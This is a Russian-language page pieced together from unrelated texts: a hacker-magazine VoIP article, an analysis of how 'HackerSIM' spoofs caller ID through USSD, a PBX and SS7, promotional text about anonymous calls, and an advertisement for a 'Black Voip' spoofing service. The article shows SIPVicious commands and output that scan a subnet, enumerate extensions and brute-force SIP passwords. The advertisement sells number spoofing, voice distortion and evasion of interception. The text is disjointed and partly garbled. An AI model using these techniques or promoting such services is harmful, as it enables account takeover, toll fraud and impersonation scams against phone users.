Мы не принимаем voip номера повторите попытку используя другой номер
Еще не так давно сервис
Clickatel,
позволяющий отправлять SMS с любого номера, казался настоящей находкой.
Побаловались - и надоело. Пора сделать следующей шаг и разобраться, как с
произвольного номера можно. позвонить и поговорить с человеком. А заодно
посмотреть, как возможно перехватить голосовой трафик, подобрать пароль для
аккаунта у SIP-провайдера и просто умело использовать замечательную технологию
VoIP.
Где взять дешевую связь?
Реализаций технологии, которая в целом называется Voice over IP (передача
голоса по IP), существует очень много. Взять хотя бы всем известный Skype.
Создатели разработали свой собственный протокол для передачи данных, позволяющий
обмениваться данными тем абонентам, между которыми прямое соединение установить
невозможно из-за файрволов и маршрутизаторов. К слову, перед тем как продать
eBay сам Skype Никлас Зеннстрём и Янус Фриис запатентовали фирменную пиринговую
технологию, и теперь (после сделки в несколько миллиардов долларов) собираются
вернуть свое детище назад. Впрочем, речь не об этом. Вопрос - так кто же
предоставляю самую дешевую связь посредствам VoIP? Ответить просто - никто.
Еще один интересный момент. Каждый из Betamax-сервисов предоставляет
замечательную услугу — Direct Call, позволяющую обоим собеседникам обходиться
одним только телефоном безо всякой гарнитуры. Итак, смысл в следующем. В одно из
предложенных текстовых полей ты вводишь свой телефон, в другое — телефон своего
собеседника, тут же нажимая кнопку «Соединить». Не пройдет и пары секунд, как
раздастся телефонный звонок. Один на связи! Теперь сервис позвонит твоему
собеседнику. Как только тот возьмет трубку, между вами будет установлена прямая
связь. Вот так просто и эффектно. Причем состояние («идет звонок», «занято»,
«абонент не отвечает») ты в реальном времени можешь посмотреть на сайте (если,
конечно, для звонка используешь именно его).
Как пробрутить SIP-аккаунт
Для этого сначала просканируем заданную подсеть (скажем, это будет
192.168.1.1/24), чтобы найти BPX:
[you@box sipvicious]$ ./svmap 192.168.1.1/24
| SIP Device | User Agent
|
---------------------------------------------
| 192.168.1.103:5060 | Asterisk PBX
|
[you@box sipvicious]$
Таким образом, мы нашли нашу АТС-ку. Далее необходимо провести ее анализ и
отыскать extention'ы:
[you@box sipvicious]$ ./svwar.py 192.168.1.103
| Extension | Authentication |
------------------------------
| 123 | reqauth
|
| 100 | reqauth
|
| 101 | noauth
|
[you@box sipvicious]$
И хотя результат для нас вряд ли можно назвать неожиданным, мы видим, что
номер 101 не требует авторизации. А для 100 и 123 требуется ввести пароль.
Попробуем подобрать его для 100, используя подбор по числовым значениям (а они
используются более чем часто):
[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 100
| Extension | Password |
------------------------
| 100 | 100 |
Пароль подобран! Теперь попробуем взломать пасс для аккаунта 123, используя
словарик:
[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 123 -d
dictionary.txt
| Extension | Password |
------------------------
| 123 | secret |
Пассы найдены: осталось подставить найденные логин-пароль в свой SIP клиент и
проверить их в действии.
Конечно, вероятность успешного брутфорса на отдельно взятый аккаунт невелика.
Но среди сотен extention'ов всегда найдется хотя бы один со слабым паролем.
Более того, подход "обнаружить bpx, найти extention, подобрать пароль" является
одной из самых простых на VoIP. В ближайших номерах мы вернемся к этому вопросу
более детально.
Как подделать номер?
Возможность звонить по дешевым тарифам - это уже само по себе хорошо. Только
вот вместо твоего номера у абонента отображается либо "номер скрыт", либо
непонятный номер VoIP-шлюза, обратные звонки на который ни к чему хорошему не
приведут. Намного веселее, если бы в качестве CallerID можно было указать номер
своего сотового телефона, а еще веселее - любой произвольный номер! В былые
времена и, по правде говоря, не такие уж и давние, фокус с подделкой Caller ID
можно было провернуть, используя лояльность в настройках SIP-операторов. Правда
для этого приходилось серьезно попыхтеть, чтобы среди огромного количества
SIP-провайдеров найти тех, которые своими политиками жестко не фиксировали поле
CallerID, позволяя установить в него произвольное значение. Повторить фокус
сейчас, увы, не удалось, поэтому мы решили искать другие варианты.
Как прослушать Skype и SIP?
Как завести бесплатный номер за границей
Мини-атс из точки доступа!
ipkg uninstall asterisk
ipkg install asterisk14
reboot
WARNING
Некоторые владельцы хотспотов намеренно блокируют протокол SIP, чтобы клиенты
не использовали IP-телефонию.
Вся информация представлена исключительно в ознакомительных целях. В случае
использования ее в незаконных целях редакция ответственности не несет.
На прошлой неделе на хабре появилась статья про HackerSIM с интригующим названием и многообещающем содержанием. Суть статьи сводилась к следующему: за существенную сумму, на порядок превышающую стоимость обычной sim-карты, некие ребята предоставляют Вам свою sim-карту, которая позволяет «безопасно звонить с любого номера из любой страны с любым голосом на выбранные номера» (в кавычках потому, что здесь цитируется агрегация тезисов из ранее упомянутой статьи). Посмотрев комментарии, выяснилось, что к данной теме проявляется живой интерес, но ни у кого нет точного понимания, как это работает и работает ли вообще.
Описание работы услуги
Мы постараемся не утомлять читателя техническими подробностями и опишем некоторые процессы на достаточно абстрактном уровне. В случае интереса к каким-то неосвещённым деталям, просим писать вопросы в комментарии. Надеемся, это дополнит общую картину.
Подключение и регистрация в сети
При установке новой sim-карты, первым делом телефон пытается подключиться к домашней сети. Как уже было много раз написано, телефон сортирует доступные частоты по уровню сигнала в порядке убывания и затем настраивается на них по очереди в поисках своего оператора, пока данный процесс не завершится успехом. Рассматриваемая sim-карта, как заявлено, работает в любых странах мира, поэтому, очевидно, что, как правило, работа её проходит не в домашней сети – sim-карта находится в роуминге и для связи использует базовые станции, предоставляемые другими операторами. Только другие операторы «просто так» не предоставляют своё оборудование «не своим» клиентам, происходит это лишь в том случае, если между операторами заключены роуминговые соглашения.
Однако, во-первых, ассоциация GSM старается широко распространить стандартизованные роуминговые соглашения, а во-вторых никто не проверял как работает данная сим-карта в других странах. По непроверенным данным в современном мире чаще всего у всех со всеми есть эти соглашения, но здесь важно не это, а то, что у провайдеров такой услуги должен быть лицензированный оператор, который предоставляет им sim-карты, а у оператора есть роуминговые соглашения.
Как было только, что сказано по умолчанию Ваш телефон подключается к базовой станции с наибольшим уровнем сигнала. Но в целях обеспечения безопасности, а именно – защиты от IMSI Catcher’ов, при использовании данной sim-карты подключение происходит ко второй по мощности BTS (Base Transceiver Station). С технической точки зрения сделать это можно лишь на очень низком уровне, ведь всю логику работы с радиоканалом выполняет baseband processor (модем – отдельное устройство в Вашем телефоне со своей архитектурой и ОС). На Defcon 21 был представлен доклад «The Secret Life of SIM Cards», из него можно понять, что и на sim-карте есть своя ОС и свои приложения. При этом приложения на sim-карте могут отображать простейшие UI control’ы – к примеру услуга «Живой баланс» реализуется именно так, открывать url’ы, отправлять sms’ки, совершать звонки, получать уведомления о начале/завершении вызова.
Данные приложения пишутся на сильно урезанной версии языка Java и для взаимодействия используют SIM Toolkit (STK) API. Документации по поводу работы SIM Applets и baseband processor’а мало, но если функция выбора второй по мощности базовой станции работает, то реализоваться это может именно с помощью SIM Applet’а. Это действительно трудоёмкая и сложная работа (возможно даже невыполнимая — мы не изучали детально документацию на предоставляемый baseband’ом интерфейс), выполнить которую может только высококвалифицированный специалист, но наше мнение – эта функция не поддерживается в этих sim-картах, так как для её выполнения требуется очень много ресурсов, а результат мало того, что сомнительный, так и для абсолютного большинства незаметный (не каждый может проверить). Поэтому скорее всего это просто маркетинговая уловка. Ещё одним аргументом в пользу того, что данная функция не реализована является то, что написанное приложение нужно «залить» на sim-карту. Сделать это, естественно, может не кто угодно, а лишь обладатель ключа OTA Install Key, уникального для каждой sim-карты.
В презентации, указанной выше, есть слайд с оператором Shadytel и распространяемой им sim-картой с Ki, IMSI и OTA Install Key. Мы не знаем является ли он лицензированным, но если является, и организаторы услуги «Hacker SIM» используют этого или подобного оператора, то пользователю данной sim-карты должно плохо спаться, потому что пока он спит на его карту третьи лица могут вовсю заливать код (ведь они знают OTA Install Key).
Осуществление звонка с любого номера
Теперь перейдём к самому интересному – тому, что демонстрируется в видео, подтверждается комментариями к статье, а значит и реализовано – совершению звонков с абсолютно любых номеров.
Идея данного приёма заключается в том, что для звонка в телефонных сетях для идентификации вызывающей стороны (Caller’а) используются одновременно два идентификатора: идентификатор номера, по которому выставляется счёт, и номера, который высвечивается на оборудовании принимающей звонок стороны (Callee).
Для начала важно понимать, что обычная телефонная сеть на самом деле состоит из двух. Первая сеть используется для передачи трафика вызовов пользователей, вторая — сеть с коммутацией пакетов, которая используется для установления голосовых вызовов, их завершения, поддержки различных других возможностей, в частности caller id и особых номеров, начинающихся с 800. Эта сеть и есть общеканальная система сигнализации № 7 (Signal System 7, SS7). Изначально доступ к ней имели лишь узлы коммутации и базы данных операторов связи. Однако позже доступ был частично расширен и на PBX (private branch exchange — частные корпоративные линии) для предоставления доступа к caller id и другим возможностям SS7 через ISDN PRI (вид подключения к ISDN и кабеля, используемого для него).
Воздействовать на первый идентификатор (он носит название ANI (Automated Number Identification) или CHARGED DN) противозаконно и, как правило, невозможно. Манипулирование же вторым параметром (Caller ID) может совершаться любым PBX’ом (private branch exchange — частные корпоративные линии), подключённым к ISDN. Таким образом, всякий обладающий доступом к телефонной линии через SIP или PRI, может менять Caller ID на какой ему вздумается не особо переживая о последствиях. Операторы телефонной связи ISDN обычно не проверяют соответствие Caller ID реальному. Провайдеры VoIP еще менее склонны к уменьшению функциональности своих клиентов.
Из этого следует, что номер, отображаемый на экране принимающей стороны подменить очень легко. Так же видно, что анонимность, при совершении вызова в телефонной сети общего пользования полностью отсутствует. Достигается это за счет ANI или CHARGED DN. Именно на основе этого номера работают системы следственно-розыскных мероприятий, в то время, как Caller ID в таких случаях уже никого не интересует.
Установить PBX – по сути, обычную телефонную сеть в офисе – не составляет никакого труда, как с финансовой точки зрения, так и административной. PBX в свою очередь подключается к телефонной сети общего пользования при помощи PRI (провайдер протягивает кабель до Вашего офиса), либо при помощи SIP уже не по телефонному кабелю, а по доступному интернет-каналу. В результате данного мероприятия Вашему офису выделяется пул городских номеров, с которых и на которые можно свободно звонить.
Резюмируя только что сказанное: для звонка с произвольного номера необходимо просто заказать у телефонного оператора ISDN предоставление вам доступа к телефонной сети через PRI или у SIP провайдера телефонной связи доступ через SIP, с возможностью манипулировать некоторыми параметрами голосовых вызовов (в частности Caller ID).
Официальный регулирующий орган FCC (Federal Communications Commission, Федеральная комиссия по связи США) по этому поводу высказываются следующим образом: «Операторы связи должны предоставлять корректный номер для отображения для конечно пользователя, и по возможности имя компании, осуществляющей вызов». За предоставление недостоверной информации для операторов США предусмотрены штрафы. Однако ситуация, когда Caller ID меняется не оператором, не регулируется никак даже в США.
Но, используя данный подход, можно позвонить с произвольным номером (как мы выяснили это Caller ID) лишь с телефона организации, которой принадлежит PBX, а провайдеры услуги произвольного номера заявляют и демонстрируют в многочисленных видео, что позвонить с заданным номером можно с любого мобильного телефона при отсутствии интернета и любого стороннего ПО.
Решение данной проблемы нам кажется действительно интересным (можно даже сказать хакерским). Процесс звонка с мобильного телефона на другой с произвольным исходящим Caller ID изображён на схеме:
На схеме изображено, как абонент с номером 1234567 (будем называть его абонент А) звонит абоненту 7654321 (абонент Б) с произвольным номером.
Первым делом, согласно инструкции с одного из сайтов, предоставляющих услугу sim-карты с возможностью менять исходящий номер, необходимо ввести USSD команду типа 150*номер_телефона*, что абонент А и делает.
Телефон подключён к сети, он находится в роуминге, поэтому первые два шага, изображённые на схеме выполняются тривиально, в полном соответствии с документацией GSM. На третьем шаге MSC (Mobile Switching Center), согласно своим таблицам маршрутизации отправляет запрос на HLR домашнего оператора sim-карты и получает указание на переадресацию USSD на номер 1234123, который в свою очередь является офисным телефоном организации, подключённым к PBX. Последний при помощи кабеля, проложенного провайдером ISDN, через PRI ISDN подключён к SS7. Таким образом, на 4-ом шаге исходная USSD-команда доходит до АТС распространителей это sim-карты. На этом оборудовании, вероятно, запущено специфичное ПО, которое по данному запросу добавляет себе в конфиг правило по замене номера, от которого пришёл запрос, на номер в USSD команде.
Далее абонент А производит звонок абоненту Б. Шаги 1-5 в точности повторяются и звонок доходит до АТС, после чего она «сбрасывает» абонента А. Приложение на АТС в свою очередь, используя Caller ID spoofing для подмены номера, совершает звонок на номера абонентов А и Б. Звонок доходит до абонента А и ему «высвечивается» либо случайный номер, либо номера телефона, подключённого к PBX, параллельно звонок доходит до абонента Б, на экране телефона он видит фэйковый номер телефона и берёт трубку. Далее АТС просто «пробрасывает» трафик, который передаётся во время разговора абонентов.
Так как утверждается, что весь голосовой трафик проходит через одну АТС, несложно догадаться, что именно там меняется тональность голоса абонента. Но это и создает дополнительные риски – поскольку все звонки проходят через неё, не составляет особого труда их там записывать/сохранять/анализировать.
Выводы
В завершении хочется выразить мнение, что звонок с любого номера с выбранной тональностью голоса – штука, бесспорно крутая для розыгрышей и приколов – мы уверены теперь сможет сделать при наличии желания любой читатель, защищённость разговоров, не превышающая обычную, а местами так и уступающая дефолтной защищённости в 2G-сетях (операторы зачастую используют A5/3, о 3G-сетях даже не говорим), отсутствие декларированной анонимности и защиты от прослушки, отсутствие поддержки смс и Интернета, а также потенциальная возможность сбора Вашего голосового трафика третьими лицами (ведь понятно, что они могут не только менять тональность голоса, но и параллельно сохранять и анализировать), — сомнительная услуга за немалые деньги даже при учёте издержек на роуминг.
Отдельно хочется выделить «хакерскую» мысль разработчиков, которые задействовав возможности, которые предоставляет оператор, абсолютно легально (за исключением, быть может, продажи sim-карт без документов) – а ведь у многих первым делом возникал вопрос о легальности данного сервиса – организовали данную услугу. Но, к сожалению, это тот случай, когда выглядит всё намного привлекательнее, чем есть на самом деле.
Следует отметить, что предлагаемая реализация данной услуги с высокой долей вероятности совпадает с тем, что реализовано у людей, её продающих. Но при этом не стоит забывать, что и мы можем ошибаться. Для того же, чтобы расставить все точки над “i”, необходимо приобрести данную sim-карту и поисследовать, как она работает. Но стоимость данного мероприятия остужает исследовательский пыл.
Сделать телефонный звонок анонимным в наше время довольно непросто. Тем не менее, имеются определенные способы добиться того, чтобы ваш телефон остался неузнанным. Например, опция анонимного звонка в телефонном аппарате, специализированное ПО, антиопределитель номера. Однако особой популярностью в последнее время пользуются звонки с подменой номера. Это идеальный способ, чтобы надежно замаскировать ваш телефонный номер от оппонента на другом конце связи.
Кому интересны звонки с подменой телефонного номера?
Существует устойчивый стереотип, что сокрытие номера телефона необходимо только пранкерам или мошенникам. Однако на практике желание замаскировать звонок может возникнуть у самых разных людей и в различных ситуациях.
Анонимные звонки используются в следующих случаях:
Это лишь малая часть жизненных ситуаций, когда подмена реального номера исходящего звонка может сослужить добрую службу. Причем, как в частной жизни, так и в профессиональной деятельности.
Как скрыть свой реальный номер телефона на практике?
Имеется немало путей, позволяющих сделать телефонный звонок анонимным.
Вот наиболее распространенные из них:
- анонимный звонок с помощью настроек мобильника. Это один из простейших вариантов, однако, подобная опция присутствует далеко не в каждом телефоне. Зато аппаратные средства обычно позволяют делать замаскированные звонки бесплатно;
- услуга антиопределителя номера, предоставляемая оператором. Здесь следует отметить, что подобный функционал дает не каждый телефонный провайдер, и услуга эта, как правило, платная. Кроме того, данная функция при зарубежных звонках не всегда работает;
- специальные приложения. Многие популярные гаджеты допускают программные способы совершать звонки-невидимки. Так, например, реализуется подмена номера при звонке Android. При этом чаще всего речь идет о платных приложениях, которые необходимо устанавливать на телефон. Также возможна подмена номера при звонке с iPhone;
- анонимные звонки с помощью IP-телефонии. Такие звонки с подменой номера с телефона Андроид или другого гаджета – очень интересный способ, открывающий немало дополнительных возможностей. Поэтому мы к нему еще вернемся и рассмотрим подробнее.
Также стоит отметить, что скрывать телефонный номер можно не только при совершении звонков, но и при отправке СМС. Это тоже полезный вариант, который может пригодиться на практике.
Пример работы подмены номера через программу-звонилку
Варианты отправки анонимных SMS:
Звонки через Интернет с подменой номера
Пожалуй, это наиболее универсальный способ, позволяющий выполнять анонимные звонки. Как уже говорилось, через протоколы IP-телефонии можно выполнять как звонок с подменой номера iPhone, так и звонок с подменой номера телефона Android или большинства других гаджетов. При этом не требуется каких-то особых навыков или знаний: весь функционал предоставляют провайдеры через специальные интернет-сайты.
Абонент может получить следующий набор функций:
-
, возможность подмены номера в СМС;
- дешевые или безлимитные звонки внутри сети;
- звонки по всему миру по минимальным расценкам;
- шанс получить дополнительную защиту от прослушки звонков и перехвата номера SIM-карты.
Чаще всего для перечисленных целей используется специальное ПО, предоставляемое провайдером услуг. Например, программа для Андроид для звонков подменой номера, приложения для гаджетов с другими операционными системами.
Подведем итоги
Очевидно, что распространенный стереотип о том, что подмена номера при выполнении телефонных звонков нужна только мошенникам или любителям пошутить, уже устарел. В настоящее время такая услуга может применяться в очень разных ситуациях. Пожалуй, ее правильно будет рассматривать как один из современных видов связи, который имеет немало преимуществ.
Область использования вариантов связи с подменой номера довольно широка. Это не только защита личной жизни, но и возможность более эффективно вести бизнес с помощью современных электронных средств. Более того, при определенных условиях анонимные звонки позволяют получить значительную экономию на междугородних и международных разговорах. Уже только этот факт делает услугу связи с подменой номера все более популярной и востребованной.
Весь процесс полностью автоматизирован,
Вы просто совершаете привычный звонок с любого телефона или компьютера
Вы или ваш собеседник инициируют звонок
Через USSD-канал команда уходит на один из наших защищенных серверов
Сервер подменяет Ваш номер, Ваш голос, скрывает Ваше местоположение
Ваш разговор происходит через надежное защищенное соединение
После окончания разговора подменный номер остаётся в детализации собеседника
Связь Black Voip
максимально защищена от прослушки
- Подмена номера
- По желанию отключить запись
- Отсутствие локации
- Скрытие IMEI и IMSI
- Принудительное шифрование
- Собственные сервера
- Холодные звонки
- Обзвон клиентов
- Абсолютная анонимность личности
Подмена номера на любой номер в международном формате*
Можно использовать
сотовые и городские номера
в качестве подменного*
В детализации абонента, которому Вы звонили, будет указан подменный номер
- Номер используется только для исходящих вызовов -
по номеру подмены невозможно дозвониться до Вас
Убедитесь в возможностях подмены номера Просто закажите звонок с любого номера,
и мы перезвоним Вам с него:
Убедитесь в возможностях подмены номера Просто закажите звонок с любого номера,
и мы перезвоним Вам с него:
Внимание! Номера телефонов должны быть различными
Полная безлимитная связь по всему миру
Связь Black Voip работает на всех странах мира
- Звоните откуда угодно
- Звоните куда угодно
- Разговаривайте сколько угодно
- Black Voip работает по всему миру
Функция подмены (искажения) голоса
Полностью исключает идентификацию абонента по фонетическим характеристикам
- Искажение голоса прямо во время разговора
- Трансформация Вашего "отпечатка" голоса
- Подмена в реальном времени, без задержек
Выбирайте голос из 7 различных
тембров: от низого до высокого
Защита от определения местоположения
- Возможность стать невидимым для комплексов перехвата
- Нaши сервера игнорируют сигналы от
виртуальной базовой станции перехватчика - Отсутствие геолокации
Подключите номер для приёма входящих
звонков с кодом Москвы, Нью-Йорка, Лондона и еще 1527 городов по всему миру
Москва
Нью-Йорк
Лондон
Стоимость и тариф
Подключение
(единоразово) т.е только один раз оплачиваете
Тариф
Минута, Цены фиксированные.
В стоимость уже включено:
- Аккаунт с балансом около 60 минут
- Защита от прослушки
- Функция подмены номера
- Искажение голоса
- Защита от определения местоположения
- Неограниченное количество подмены
- Техническая поддержка 24/7
ПОДКЛЮЧИТСЯ>Если в списке нет удобного варианта оплаты,обратитесь в Поддержку
Что происходит после заказа
Вам приходит e-mail
с подтверждением
заказа
С Вами связывается
саппорт
агент
для Вас
создаем
аккаунт
Бесплатно настраиваем
за 2 минуты
-
Обеспечиваем
премиум-связь
по всему миру
Зарабатывайте вместе с Black Voip
Направьте заявку,
чтобы стать партнером Black Voip в Вашем регионе
Как только подключаетесь после оплаты, через 10 минут на вашу почту придет аккаунт данные для входа в личный кабинет,после регистрации вам даем аккаунт с балансом.(Бывают задержки если много заказов)
Пополнить баланс можно картами Visa и Mastercard, через терминалы QIWI и через Сбербанк,Биткоин.В личном кабинете Поддержка
В отличии от других мы гарантируем подмену номера, если подмена не будет работать, деньги вернем, часть суммы подключения будет на вашем балансе. Поддержка
Работаем с 2010 года, клиенты довольны, мы главный провайдер Voip, более 900 отзывов, официальные кассы, звонки идут по прямой линии на телефон.
Читайте также: